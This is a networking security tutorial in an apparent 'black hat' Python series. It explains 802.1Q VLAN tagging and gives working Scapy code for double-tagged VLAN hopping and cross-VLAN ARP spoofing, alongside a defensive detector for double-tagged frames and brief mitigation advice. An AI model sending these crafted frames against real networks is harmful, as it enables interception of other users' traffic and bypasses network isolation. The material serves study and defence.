Python Black Hat Programming 3.4
A Virtual Local Area Network (VLAN) is a virtual network built on top of Ethernet switching. It can divide one physical network into several VLANs, or overcome physical network boundaries so that users on different physical segments are placed in the same VLAN. Figure 2 shows an example of VLAN division.
Figure 2
There are many ways to implement VLANs. VLAN division on switching equipment generally falls into two types:
- Port-based division on the switch
- Tag-based division using the extended Ethernet frame format defined by the IEEE 802.1Q protocol
Layer-2 VLAN technology also introduces the concept of trunking. Trunking is used to connect different switches, so that members of the same VLAN spread across several switches can still communicate with each other. The port used to interconnect switches is called the trunk port. Besides 802.1Q, Cisco has its own trunk protocol called ISL.
Figure 3
Figure 3 shows an 802.1Q frame. It is not fundamentally different from an ordinary Ethernet frame; it only adds a VLAN tag. The VLAN Identifier field (shown in red) identifies the VLAN a frame belongs to, so that the frame is not broadcast beyond that VLAN.
This raises a simple question: to communicate across VLANs, is it enough to modify the identifier in the frame?
3.4.1 VLAN Hopping
Based on the above analysis, consider a simple scenario: send a ping request from a host in VLAN 1 to a host in VLAN 2.
Before coding, we still have to solve the problem of constructing VLAN frames. In Scapy, the Dot1Q class builds the tag section from Figure 3; see Figure 4.
Figure 4
Now we can write a cross-VLAN ping request.
```python
#!/usr/bin/python
from scapy.all import *

# Two stacked 802.1Q tags: the outer tag carries the sender's VLAN,
# the inner tag the target's VLAN.
packet = Ether(dst="c0:d3:de:ad:be:ef") / \
    Dot1Q(vlan=1) / \
    Dot1Q(vlan=2) / \
    IP(dst="192.168.13.3") / \
    ICMP()
sendp(packet)
```
The code above specifies the MAC address and IP address of the target host and adds two VLAN IDs: the first is the VLAN of the sending host, the second is the VLAN of the target host. The switch strips the first tag and, on reading the second, forwards the frame to the target host.
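From the defender's side, the same double-tagged frame is easy to recognise on an access port, which should never carry a tag at all. The following detector is an added example, not code from the original article: it walks stacked 802.1Q/802.1ad tags in a raw Ethernet frame and classifies the frame, using a constructed sample frame matching the Scapy snippet above (the source MAC and IPv4 payload bytes are made up).

```python
import struct

TPID_8021Q = 0x8100   # IEEE 802.1Q customer tag (the TPID in Figure 3)
TPID_8021AD = 0x88A8  # IEEE 802.1ad service tag (QinQ outer tag)


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def parse_tags(frame):
    """Return (dst, src, vlan_ids, inner_ethertype) for a raw Ethernet frame.
    vlan_ids is ordered outer -> inner, so a double-tagged frame yields [outer, inner]."""
    if len(frame) < 14:
        raise ValueError("runt frame")
    dst, src = mac_str(frame[0:6]), mac_str(frame[6:12])
    off, vlan_ids = 12, []
    ethertype = struct.unpack("!H", frame[off:off + 2])[0]
    while ethertype in (TPID_8021Q, TPID_8021AD):
        if len(frame) < off + 6:
            raise ValueError("truncated VLAN tag")
        tci = struct.unpack("!H", frame[off + 2:off + 4])[0]
        vlan_ids.append(tci & 0x0FFF)  # low 12 bits of the TCI = VLAN Identifier
        off += 4
        ethertype = struct.unpack("!H", frame[off:off + 2])[0]
    return dst, src, vlan_ids, ethertype


def classify(frame):
    """Verdict for a frame received on an access port, which should carry no tag."""
    vlan_ids = parse_tags(frame)[2]
    if len(vlan_ids) >= 2:
        return "double-tagged"  # outer tag stripped upstream, inner tag would hop VLANs
    if len(vlan_ids) == 1:
        return "tagged"
    return "untagged"


# Constructed samples (not real captures): the frame the Scapy snippet above builds,
# dst c0:d3:de:ad:be:ef / Dot1Q vlan=1 / Dot1Q vlan=2 / IPv4, and its untagged twin.
_HDR = bytes.fromhex("c0d3deadbeef") + bytes.fromhex("0242ac110002")
_IPV4 = struct.pack("!H", 0x0800) + b"\x45\x00" + b"\x00" * 18  # dummy IPv4 payload
SAMPLE_DOUBLE_TAGGED = _HDR + struct.pack("!HH", TPID_8021Q, 1) + struct.pack("!HH", TPID_8021Q, 2) + _IPV4
SAMPLE_UNTAGGED = _HDR + _IPV4

if __name__ == "__main__":
    for name, frame in (("double", SAMPLE_DOUBLE_TAGGED), ("plain", SAMPLE_UNTAGGED)):
        print(name, classify(frame), parse_tags(frame)[2])
```

Feeding the bytes of a captured frame to `classify` gives "double-tagged" for the hopping frame; on a real network the same check is usually enforced by disabling the native VLAN on trunks and forcing access ports into access mode.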
3.4.2 Cross-VLAN ARP Spoofing
Sections 3.1, 3.2 and 3.3 discussed ARP spoofing. Because a VLAN limits the broadcast domain, our earlier code cannot perform ARP spoofing across VLANs. To solve this, we only need to insert VLAN IDs into the previously constructed ARP spoofing frames. The following code is the ARP request constructor from section 3.1.
```python
def build_req():
    # `options`, `args` and `mac` come from the option parsing of the
    # section 3.1 script: args[0] is the IP address we claim, options.target
    # is the victim (None means broadcast), and mac is our own MAC address.
    if options.target is None:
        pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / \
            ARP(hwsrc=mac, psrc=args[0], pdst=args[0])
    elif options.target:
        target_mac = getmacbyip(options.target)
        if target_mac is None:
            print("[-] Error: Could not resolve target's MAC address")
            sys.exit(1)
        pkt = Ether(src=mac, dst=target_mac) / \
            ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target)
    return pkt
```
In the frame construction part, we insert the VLAN IDs, where our_vlan is the sender's VLAN and target_vlan the target's VLAN:
```python
pkt = Ether(src=mac, dst=target_mac) / \
    Dot1Q(vlan=our_vlan) / Dot1Q(vlan=target_vlan) / \
    ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target)
```
In this way, cross-VLAN ARP spoofing can be achieved.
3.4.3 Summary
This section described how to construct frames that bypass VLAN separation to achieve cross-VLAN communication and ARP spoofing. Note that the methods in this article target the 802.1Q protocol and have no effect on VLANs isolated by physical port assignment.
This concludes the detailed explanation of Python Black Hat Programming 3.4, crossing VLANs. I hope it helps you. If you have any questions, please leave a message and I will reply in a timely manner.